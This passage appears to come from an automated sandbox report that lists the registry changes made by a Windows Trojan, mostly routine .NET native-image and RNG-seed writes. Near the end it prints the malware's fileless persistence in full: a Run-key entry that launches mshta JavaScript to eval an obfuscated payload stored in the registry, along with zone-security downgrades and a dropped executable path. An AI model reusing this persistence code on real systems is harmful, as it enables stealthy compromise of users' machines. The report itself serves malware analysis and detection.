[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2284 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 4D 6D 00 FD F4 D5 28 53 D9 CB 8D 45 C2 6C 6D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "C8 72 10 C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:3484 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 AE 1D EF 6C 2D 88 D8 76 C0 1D 10 D7 D2 5E E6"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2168 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 00 35 84 DF A4 99 38 7B 60 2A D5 07 4D C9 EB"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2072 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "2C BB 9A C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 38 81 A1 6C C7 C9 19 E6 64 2E 68 D9 A2 6B 20"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]

The process mscorsvw.exe:3084 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "44 C8 29 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "B8 14 B1 BF AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 27 1B FE ED E6 AE 9E E4 D6 4F B9 AA 92 DA 70"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:2408 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 CD 79 1E C6 15 7A 89 BF B0 25 7A 2D 1E 6F F6"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:828 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 25 DD 5E 6E 4B B4 85 04 B3 3B 26 95 D9 C9 97"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "1A 26 E3 BF AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process regsvr32.exe:3384 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 61 CF CB 61 1C 26 88 90 15 8E 95 57 35 E8 DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process regsvr32.exe:3264 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:nGqU8fhUg5=Fh69Ffs;r49L=new ActiveXObject(WScript.Shell);fZR7QqjRn3=8Sz6E;I2tCE2=r49L.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);zOYw9cby=4io;eval(I2tCE2);jXFqs0MMa=Ua;o."

[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"
"5232108f" = "ÈwûFª2°p~,¤eŒ@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK«8GÝt9mFù„z˜-ßô‚]ꨧÖ×mà`fhêç‡/«hÜ°remIèÑyDÈ6 ˆŸG”ô?1˜ußXV@@¿°2iVT©Ðãà¯ÉÛ)ŠÕ9NœJ:4ÒŠm¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&”š®Ø©(;°REø¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGÝ¡=ž=B±‡uÕµyáC91wo{¢Aû8oò¨ƒ@‹^×Ádð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûŠ¦YÙ]½oes¶‹´"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"

[HKCU\Software\e307dfcb0a]
"f4ea4294" = "865"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\e307dfcb0a]
